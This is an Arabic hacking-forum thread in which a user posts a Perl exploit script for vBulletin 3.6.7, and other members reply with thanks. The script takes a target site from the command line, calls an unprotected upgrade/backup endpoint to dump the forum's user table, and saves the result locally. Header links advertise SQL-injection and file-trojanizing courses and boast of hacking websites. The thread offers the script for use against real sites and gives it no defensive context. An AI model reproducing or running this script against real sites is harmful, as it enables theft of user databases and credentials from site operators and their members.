1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] vBulletin 3.6.7 Remote SQL Exploit

الموضوع في '[ الـثـغـرات ]' بواسطة mr.grey hat, بتاريخ ‏9 أكتوبر 2014.

كاتب الموضوع : mr.grey hat المشاهدات : 607 الردود : 12 ‏9 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    أسم الثغرة : vBulletin 3.6.7 Remote SQL Exploit
    مكتشف الثغرة : Hani Xavi
    المصدر : vBulletin 3.6.7 Remote SQL Exploit

    الاستغلال:
    [SQL]
    vBulletin 3.6.7 Remote SQL Exploit By Hani Xavi



    U need To Watch The Vidéo :) : https://www.youtube.com/watch?v=X1nZmwPrzQI



    #!/usr/bin/perl

    use LWP::UserAgent;

    use HTTP::Request;

    system("clear");

    print "------------------------------------------------\n";

    print " vBulletin 3.6.7 Exploit \n";

    print " Coded by Hani Xavi \n";

    print "------------------------------------------------\n";

    $target = $ARGV[0];

    $path = $ARGV[1];

    if($target eq '')

    {

    print "[*] Usage: perl vb.pl <target> <path> \n";

    exit(1);

    }



    if($target !~ /http:\/\//)

    {

    $target = "http://$target";

    }

    sleep 1;

    print "[*] Exploiting . . \n";

    $agent = LWP::UserAgent->new();

    $agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');

    $website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";

    $req = $agent->request(HTTP::Request->new(GET=>$website));

    if($req->is_success)

    {

    open(FILE, "> vBulletin_content.txt");

    print FILE $req->content;

    close(FILE);

    print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";

    }

    else

    {

    print "[-] Exploit not sent . \n";

    }
    [/SQL]
     


    جاري تحميل الصفحة...
  2. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    وعليكم السلام
    بارك الله بيك
     


  3. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    وبيك أخي الكريم وشكرا على المرور ​
     


  4. غير متصل

    saudi-hack
    Developer

    عضو منذ:
    ‏30 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك العافية و يخليك إن شاء الله
     


  5. غير متصل

    KhaLaF
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طـآلـب
    الإقامة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    كم أنت مبدع
    :ُae@: :ُae@:
     


  6. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    مشكورين أخواني على المرور نورتو صفحتي ​
     


  7. غير متصل

    LiMoO
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    مطور مواقع
    الإقامة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك الصحة أخي :ُeُe.1:
     


  8. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي أخ LiMoO مشكور على مرورك ​
     


  9. غير متصل

    G3niUs.M4n
    rankrank
    Developer

    عضو منذ:
    ‏14 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    بارك الله بك و نفع بك
     


  10. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي رب ومشكور أخوي G3niUs.M4n على مرورك العطر ​
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...